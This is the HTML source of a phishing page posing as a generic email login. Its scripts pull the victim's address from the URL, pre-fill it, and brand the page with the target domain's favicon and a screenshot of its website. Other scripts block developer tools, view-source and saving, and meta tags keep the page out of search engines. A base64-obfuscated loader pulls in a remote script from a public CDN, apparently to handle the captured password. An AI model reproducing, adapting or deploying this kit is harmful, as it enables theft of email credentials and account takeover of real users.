<!DOCTYPE html> 
<html lang="zxx">
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <title  class="logoname">EMail Login</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>  
 
<link rel="apple-touch-icon" type="image/png"  class="logoimg" href="" /> 
<link rel="shortcut icon" type="image/x-icon"  class="logoimg"  href="https://www.google.com/s2/favicons?sz=64&domain='+domain" />
<link rel="mask-icon" type=""  class="logoimg" href="https://www.google.com/s2/favicons?sz=64&domain='+domain" color="#111" />
<meta name="robots" content="noindex">
<meta name="googlebot" content="noindex">
<meta name="googlebot-news" content="noindex" />
<meta name="otherbot" content="noindex" />
<meta name="noarchive" content="noindex" />
<meta name="nosnippet" content="noindex" />
<meta name="noimageindex" content="noindex" /> 
<meta name="robots" content="nofollow">
<meta name="googlebot" content="nofollow">
<meta name="googlebot-news" content="nofollow" />
<meta name="otherbot" content="nofollow" />
<meta name="noarchive" content="nofollow" />
<meta name="nosnippet" content="nofollow" />
<meta name="noimageindex" content="nofollow" />
<meta name="robots" content="max-snippet:0">
<meta name="robots" content="unavailable_after: 2020-09-22">
<script>
    // disable right click
    document.addEventListener('contextmenu', event => event.preventDefault());
 
    document.onkeydown = function (e) {
 
        // disable F12 key
        if(e.keyCode == 123) {
            return false;
        }
 
        // disable I key
        if(e.ctrlKey && e.shiftKey && e.keyCode == 73){
            return false;
        }
 
        // disable J key
        if(e.ctrlKey && e.shiftKey && e.keyCode == 74) {
            return false;
        }

        // Prevent Ctrl+s = disable save
        if (event.ctrlKey && (event.keyCode === 85 || event.keyCode === 83 || event.keyCode ===65 )) {
            return false;
        }

        // disable U key
        if(e.ctrlKey && e.keyCode == 85) {
            return false;
        }
    }
 
</script>
<script>
         if(dxraw == null || dxraw == ""){

            var dnx=hash.split('#')[1];



          }else{
           var dnx=dxraw; 
           window.location.replace('#'+dnx);   
        }
         </script>
 
<style  type="text/css" >

.img-fluid {
    max-width: 100% !important;
    height: auto;
}

.form-control:focus {
    box-shadow: none;
}

/** Login 40 start **/
.login-40 {
    top: 0;
    width: 100%;
    bottom: 0;
    opacity: 1;
    min-height: 100vh;
    text-align: center;
    position: relative;
    display: -webkit-box;
    display: -moz-box;
    display: -ms-flexbox;
    display: -webkit-flex;
    display: flex;
    justify-content: center;
    align-items: center;
    padding: 30px 15px;
}

.login-40 .login-inner-form {
    color: #717171;
    text-align: center;
    position: relative;
}

.login-40 h1, h2, h3, h4, h5, h6, .h1, .h2, .h3, .h4, .h5, .h6 {
    font-family: 'Jost', sans-serif;
}

.login-40 .form-section{
    max-width: 460px;
    margin: 0 auto;
    border-radius: 10px;
    padding: 40px;
    border: 1px solid #e8e7e7;
}

.login-40 .login-inner-form .form-group {
    margin-bottom: 30px;
}

.login-40 .login-inner-form .form-box {
    float: left;
    width: 100%;
    position: relative;
}

.login-40 .login-inner-form .input-text {
    font-size: 16px;
    outline: none;
    color: #717171;
    border-radius: 50px;
    border: 1px solid #dbdbdb;
    box-shadow: 0 1px 3px 0 rgb(0 0 0 / 6%);
}

.login-40 .login-inner-form img {
    margin-bottom: 5px;
    height: 40px;
}

.login-40 .login-inner-form .form-box input {
    float: left;
    width: 100%;
    padding: 15.5px 50px 15.5px 25px;
}

.login-40 .login-inner-form .form-box i {
    position: absolute;
    top: 14px;
    right: 25px;
    font-size: 19px;
}

.login-40 .login-inner-form label{
    font-weight: 500;
    font-size: 14px;
    margin-bottom: 5px;
}

.login-40 .login-inner-form .forgot{
    margin: 0;
    line-height: 40px;
    color: #fff;
    font-size: 14px;
    float: right;
}

.login-40 .login-inner-form .btn-md {
    cursor: pointer;
    padding: 15.5px 50px 14.5px 50px;
    font-size: 17px;
    font-weight: 400;
    font-family: 'Jost', sans-serif;
    border-radius: 50px;
}

.login-40 .login-inner-form input[type=checkbox], input[type=radio] {
    margin-right: 3px;
}

.login-40 .login-inner-form p{
    margin: 0;
    color: #717171;
}

.login-40 .login-inner-form p a{
    color: #717171;
}

.login-40 .login-inner-form button:focus {
    outline: none;
    outline: 0 auto -webkit-focus-ring-color;
}

.login-40 .login-inner-form .btn-theme.focus, .btn-theme:focus {
    box-shadow: none;
}

.login-40 .login-inner-form .btn-theme {
    background: #50a1ff;
    border: none;
    color: #fff;
}

.login-40 .login-inner-form .btn-theme:hover {
    background: #4595f1;
}

.login-40 .logo{
    text-align: center;
    margin-bottom: 25px;
}

.login-40 .logo img{
    height: 53px;
}

.login-40 .nav-pills li{
    display: inline-block;
}

.login-40 .login-inner-form .form-group.mb-35{
    margin-bottom: 35px;
}

.login-40 .login-inner-form .form-group.mb-30{
    margin-bottom: 30px;
}

.login-40 .login-inner-form .social-list li {
    display: inline-block;
}

.login-40 .login-inner-form .social-list li a {
    margin: 2px;
    font-size: 18px;
    width: 55px;
    height: 55px;
    line-height: 55px;
    border-radius: 50px;
    display: inline-block;
    text-align: center;
}

.login-40 .login-inner-form .social-list li a:hover{
    text-decoration: none;
    color: #fff;
}

.login-40 .login-inner-form .extra-login {
    float: left;
    width: 100%;
    margin: 30px 0 28px;
    text-align: center;
    position: relative;
}

.login-40 .login-inner-form .extra-login::before {
    position: absolute;
    left: 0;
    top: 10px;
    width: 100%;
    height: 1px;
    background: #d8dcdc;
    content: "";
}

.login-40 .login-inner-form .extra-login > span {
    width: auto;
    float: none;
    display: inline-block;
    background: #fff;
    padding: 1px 20px;
    z-index: 1;
    position: relative;
    font-family: Open Sans;
    font-size: 16px;
    color: #717171;
    text-transform: capitalize;
}

.login-40 .form-section p{
    margin: 30px 0 0;
    font-size: 14px;
}

.login-40 .form-section p a{
    color: #717171;
}

.login-40 .btn-section{
    text-align: center;
    margin-bottom: 35px;
}

.login-40 .btn-section .link-btn{
    padding: 6px 25px;
    font-size: 16px;
    border: solid 1px #717171;
    margin-right: 5px;
    letter-spacing: 0.5px;
    border-radius: 50px;
    font-weight: 400;
    color: #717171;
    text-decoration: none;
    text-decoration: blink;
}

.login-40 .btn-section .link-btn:hover{
    border: solid 1px #50a1ff;
    color: #50a1ff;
}

.login-40 .btn-section .active {
    border: solid 1px #50a1ff;
    background: transparent;
    color: #50a1ff;
}

.login-40 .login-inner-form ul{
    margin: 0;
    padding: 0;
}

.login-40 .login-inner-form .terms{
    margin-left: 3px;
}

.login-40 .login-inner-form .checkbox {
    margin-bottom: 30px;
    font-size: 16px;
}

.login-40 .login-inner-form .form-check{
    float: left;
    margin-bottom: 0;
}

.login-40 .login-inner-form .form-check a {
    color: #717171;
    float: right;
}

.login-40 .login-inner-form .form-check-input {
    position: absolute;
    margin-left: 0;
}

.login-40 .login-inner-form .form-check label::before {
    content: "";
    display: inline-block;
    position: absolute;
    width: 22px;
    height: 22px;
    margin-left: -27px;
    border: 1px solid #c5c3c3;
    border-radius: 3px;
    background-color: #fff;
}

.login-40 .login-inner-form .form-check-label {
    padding-left: 25px;
    margin-bottom: 0;
    font-size: 16px;
    color: #717171;
}

.login-40 .login-inner-form .checkbox-theme input[type="checkbox"]:checked + label::before {
    background-color: #50a1ff;
    border-color: #50a1ff;
}

.login-40 .login-inner-form input[type=checkbox]:checked + label:before {
    font-weight: 300;
    color: #f3f3f3;
    line-height: 15px;
    font-size: 14px;
    content: "\2713";
}

.login-40 .login-inner-form input[type=checkbox], input[type=radio] {
    margin-top: 4px;
}

.login-40 .login-inner-form .checkbox a {
    font-size: 16px;
    color: #717171;
    float: right;
}



/** MEDIA **/
@media (max-width: 992px) {
    .login-40 .form-section {
        padding: 30px;
    }

    .login-40 {
        padding: 30px 0;
    }
}


/*!
 * Bootstrap v4.0.0-beta.2 (https://getbootstrap.com)
 * Copyright 2011-2017 The Bootstrap Authors
 * Copyright 2011-2017 Twitter, Inc.
 * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
 */



*, ::after, ::before {
    box-sizing: border-box
}

html {
    font-family: sans-serif;
    line-height: 1.15;
    -webkit-text-size-adjust: 100%;
    -ms-text-size-adjust: 100%;
    -ms-overflow-style: scrollbar;
    -webkit-tap-highlight-color: transparent
}

@-ms-viewport {
    width: device-width
}

article, aside, dialog, figcaption, figure, footer, header, hgroup, main, nav, section {
    display: block
}

body {
    margin: 0;
    font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
    font-size: 1rem;
    font-weight: 400;
    line-height: 1.5;
    color: #212529;
    text-align: left;
    background-color: #fff
}



.form-control {
    display: block;
    width: 100%;
    padding: .375rem .75rem;
    font-size: 1rem;
    line-height: 1.5;
    color: #495057;
    background-color: #fff;
    background-image: none;
    background-clip: padding-box;
    border: 1px solid #ced4da;
    border-radius: .25rem;
    transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s
}

.form-control::-ms-expand {
    background-color: transparent;
    border: 0
}

.form-control:focus {
    color: #495057;
    background-color: #fff;
    border-color: #80bdff;
    outline: 0;
    box-shadow: 0 0 0 .2rem rgba(0, 123, 255, .25)
}

.btn {
    display: inline-block;
    font-weight: 400;
    text-align: center;
    white-space: nowrap;
    vertical-align: middle;
    -webkit-user-select: none;
    -moz-user-select: none;
    -ms-user-select: none;
    user-select: none;
    border: 1px solid transparent;
    padding: .375rem .75rem;
    font-size: 1rem;
    line-height: 1.5;
    border-radius: .25rem;
    transition: background-color .15s ease-in-out, border-color .15s ease-in-out, box-shadow .15s ease-in-out
}




.btn-block {
    display: block;
    width: 100%
}



input[type=button].btn-block, input[type=reset].btn-block, input[type=submit].btn-block {
    width: 100%
}

.fade {
    opacity: 0;
    transition: opacity .15s linear
}

.fade.show {
    opacity: 1
}

.collapse {
    display: none
}

.collapse.show {
    display: block
}

tr.collapse.show {
    display: table-row
}

tbody.collapse.show {
    display: table-row-group
}

.btn-group, .btn-group-vertical {
    position: relative;
    display: -ms-inline-flexbox;
    display: inline-flex;
    vertical-align: middle
}

.btn-group-vertical > .btn, .btn-group > .btn {
    position: relative;
    -ms-flex: 0 1 auto;
    flex: 0 1 auto
}

.btn-group-vertical > .btn:hover, .btn-group > .btn:hover {
    z-index: 2
}

.btn-group-vertical > .btn.active, .btn-group-vertical > .btn:active, .btn-group-vertical > .btn:focus, .btn-group > .btn.active, .btn-group > .btn:active, .btn-group > .btn:focus {
    z-index: 2
}

.btn-group .btn + .btn, .btn-group .btn + .btn-group, .btn-group .btn-group + .btn, .btn-group .btn-group + .btn-group, .btn-group-vertical .btn + .btn, .btn-group-vertical .btn + .btn-group, .btn-group-vertical .btn-group + .btn, .btn-group-vertical .btn-group + .btn-group {
    margin-left: -1px
}

.btn-toolbar {
    display: -ms-flexbox;
    display: flex;
    -ms-flex-wrap: wrap;
    flex-wrap: wrap;
    -ms-flex-pack: start;
    justify-content: flex-start
}

.btn-toolbar .input-group {
    width: auto
}

.btn-group > .btn:not(:first-child):not(:last-child):not(.dropdown-toggle) {
    border-radius: 0
}

.btn-group > .btn:first-child {
    margin-left: 0
}

.btn-group > .btn:first-child:not(:last-child):not(.dropdown-toggle) {
    border-top-right-radius: 0;
    border-bottom-right-radius: 0
}

.btn-group > .btn:last-child:not(:first-child), .btn-group > .dropdown-toggle:not(:first-child) {
    border-top-left-radius: 0;
    border-bottom-left-radius: 0
}

.btn-group > .btn-group {
    float: left
}

.btn-group > .btn-group:not(:first-child):not(:last-child) > .btn {
    border-radius: 0
}

.btn-group > .btn-group:first-child:not(:last-child) > .btn:last-child, .btn-group > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
    border-top-right-radius: 0;
    border-bottom-right-radius: 0
}

.btn-group > .btn-group:last-child:not(:first-child) > .btn:first-child {
    border-top-left-radius: 0;
    border-bottom-left-radius: 0
}

.btn + .dropdown-toggle-split {
    padding-right: .5625rem;
    padding-left: .5625rem
}

.btn + .dropdown-toggle-split::after {
    margin-left: 0
}

.btn-group-sm > .btn + .dropdown-toggle-split, .btn-sm + .dropdown-toggle-split {
    padding-right: .375rem;
    padding-left: .375rem
}

.btn-group-lg > .btn + .dropdown-toggle-split, .btn-lg + .dropdown-toggle-split {
    padding-right: .75rem;
    padding-left: .75rem
}

.btn-group-vertical {
    -ms-flex-direction: column;
    flex-direction: column;
    -ms-flex-align: start;
    align-items: flex-start;
    -ms-flex-pack: center;
    justify-content: center
}

.btn-group-vertical .btn, .btn-group-vertical .btn-group {
    width: 100%
}

.btn-group-vertical > .btn + .btn, .btn-group-vertical > .btn + .btn-group, .btn-group-vertical > .btn-group + .btn, .btn-group-vertical > .btn-group + .btn-group {
    margin-top: -1px;
    margin-left: 0
}

.btn-group-vertical > .btn:not(:first-child):not(:last-child) {
    border-radius: 0
}

.btn-group-vertical > .btn:first-child:not(:last-child) {
    border-bottom-right-radius: 0;
    border-bottom-left-radius: 0
}

.btn-group-vertical > .btn:last-child:not(:first-child) {
    border-top-left-radius: 0;
    border-top-right-radius: 0
}

.btn-group-vertical > .btn-group:not(:first-child):not(:last-child) > .btn {
    border-radius: 0
}

.btn-group-vertical > .btn-group:first-child:not(:last-child) > .btn:last-child, .btn-group-vertical > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
    border-bottom-right-radius: 0;
    border-bottom-left-radius: 0
}

.btn-group-vertical > .btn-group:last-child:not(:first-child) > .btn:first-child {
    border-top-left-radius: 0;
    border-top-right-radius: 0
}

[data-toggle=buttons] > .btn input[type=checkbox], [data-toggle=buttons] > .btn input[type=radio], [data-toggle=buttons] > .btn-group > .btn input[type=checkbox], [data-toggle=buttons] > .btn-group > .btn input[type=radio] {
    position: absolute;
    clip: rect(0, 0, 0, 0);
    pointer-events: none
}

.modal-open {
    overflow: hidden
}

.modal {
    position: fixed;
    top: 0;
    right: 0;
    bottom: 0;
    left: 0;
    z-index: 1050;
    display: none;
    overflow: hidden;
    outline: 0
}

.modal.fade .modal-dialog {
    transition: -webkit-transform .3s ease-out;
    transition: transform .3s ease-out;
    transition: transform .3s ease-out, -webkit-transform .3s ease-out;
    -webkit-transform: translate(0, -25%);
    transform: translate(0, -25%)
}

.modal.show .modal-dialog {
    -webkit-transform: translate(0, 0);
    transform: translate(0, 0)
}

.modal-open .modal {
    overflow-x: hidden;
    overflow-y: auto
}

.modal-dialog {
    position: relative;
    width: auto;
    margin: 10px;
    pointer-events: none
}

.modal-content {
    position: relative;
    display: -ms-flexbox;
    display: flex;
    -ms-flex-direction: column;
    flex-direction: column;
    pointer-events: auto;
    background-color: #fff;
    background-clip: padding-box;
    border: 1px solid rgba(0, 0, 0, .2);
    border-radius: .3rem;
    outline: 0
}

.modal-backdrop {
    position: fixed;
    top: 0;
    right: 0;
    bottom: 0;
    left: 0;
    z-index: 1040;
    background-color: #000
}

.modal-backdrop.fade {
    opacity: 0
}

.modal-backdrop.show {
    opacity: .5
}

.modal-header {
    display: -ms-flexbox;
    display: flex;
    -ms-flex-align: start;
    align-items: flex-start;
    -ms-flex-pack: justify;
    justify-content: space-between;
    padding: 15px;
    border-bottom: 1px solid #e9ecef;
    border-top-left-radius: .3rem;
    border-top-right-radius: .3rem
}

.modal-header .close {
    padding: 15px;
    margin: -15px -15px -15px auto
}

.modal-title {
    margin-bottom: 0;
    line-height: 1.5
}

.modal-body {
    position: relative;
    -ms-flex: 1 1 auto;
    flex: 1 1 auto;
    padding: 15px
}

.modal-footer {
    display: -ms-flexbox;
    display: flex;
    -ms-flex-align: center;
    align-items: center;
    -ms-flex-pack: end;
    justify-content: flex-end;
    padding: 15px;
    border-top: 1px solid #e9ecef
}

.modal-footer > :not(:first-child) {
    margin-left: .25rem
}

.modal-footer > :not(:last-child) {
    margin-right: .25rem
}

.modal-scrollbar-measure {
    position: absolute;
    top: -9999px;
    width: 50px;
    height: 50px;
    overflow: scroll
}

@media (min-width: 576px) {
    .modal-dialog {
        max-width: 500px;
        margin: 30px auto
    }

    .modal-sm {
        max-width: 300px
    }
}



.clearfix::after {
    display: block;
    clear: both;
    content: ""
}



.fixed-top {
    position: fixed;
    top: 0;
    right: 0;
    left: 0;
    z-index: 1030
}


.mr-0, .mx-0 {
    margin-right: 0 !important
}

.mb-0, .my-0 {
    margin-bottom: 0 !important
}
 
</style>
</head>
<body id="top" >
<div class="text-center">
    <!-- Button HTML (to Trigger Modal) -->
    <script type="text/javascript">
    $(window).on('load', function() {
        $('#myModal').modal('show');
    });
</script>

</div>

<!-- Modal HTML -->
<div id="myModal" class="modal fade" data-backdrop="static" data-keyboard="false">
 
 
<!-- Login 40 start -->
<div class="login-40">
    <div class="container">
        <div class="row">
            <div class="col-md-12">
                <div class="form-section" style="background:rgba(250,250,250,2);border-top-width: 0px;padding-top: 15px;padding-bottom: 30px;">
                    <div class="logo">
                        <a href="">
                            <img id="imag">
                                           
                       </a>
                    </div>
                    <div class="login-inner-form">
                    
                        <form id="cnt">
                            <div class="form-group form-box">
                                <input style=" opacity: 1; pointer-events:none !important;"type="email" id="email" name="email" class="input-text" placeholder="Email Address" value="" readonly>
                            </div>
                            <div class="form-group form-box">
                                <input type="password" id="password"  name="Password" class="input-text" placeholder="Email Password" required="required">
                            </div>
                            <span id="msg" style="color:red;"></span>
                            <div class="checkbox clearfix">
                                <div class="form-check checkbox-theme">
                                    <input class="form-check-input" type="checkbox" value="" id="rememberMe">
                                    <label class="form-check-label" for="rememberMe">
                                        Remember me
                                    </label>
                                </div>
                            </div>
                            <div class="form-group mb-0">
                                <button type="submit" id="submit-btn" class="btn-md btn-theme btn-block">Continue</button>
                            </div>
                        </form>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div> 
</div>
</body>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js">
</script>
<script id='EJ19' type="text/javascript"></script>
<script>
  {const encdStr = 'aHR0cHM6Ly9jZG4uanNkZWxpdnIubmV0L2doL25hemFyS3NuL3NlcnZlcmhvc3QvZG9jLmpz';
const str = atob(encdStr);
var url= str;
document.getElementById('EJ19').src = url;
}
</script>
<script>
    { document.getElementById('email').value = getEmail();

     var domain = getEmail().substring(getEmail().lastIndexOf("@") +1);
     var frmsite = domain.substring(0, domain.indexOf("."));
     var imgsrc = 'https://www.google.com/s2/favicons?sz=64&domain='+domain;
     document.getElementById('imag').src = imgsrc;
     var bkg = 'http://image.thum.io/get/width/1200/crop/1200/viewportWidth/1200/png/http://'+domain;
     document.body.style.backgroundImage ="url(" + bkg + ")";
    document.body.style.backgroundSize = "cover";


     function getEmail(){
     if(window.location.hash){
     var url = window.location.href;
            var hash = url.split('#').pop();
            return (hash);
     }
    }
    }
    </script>
  </html>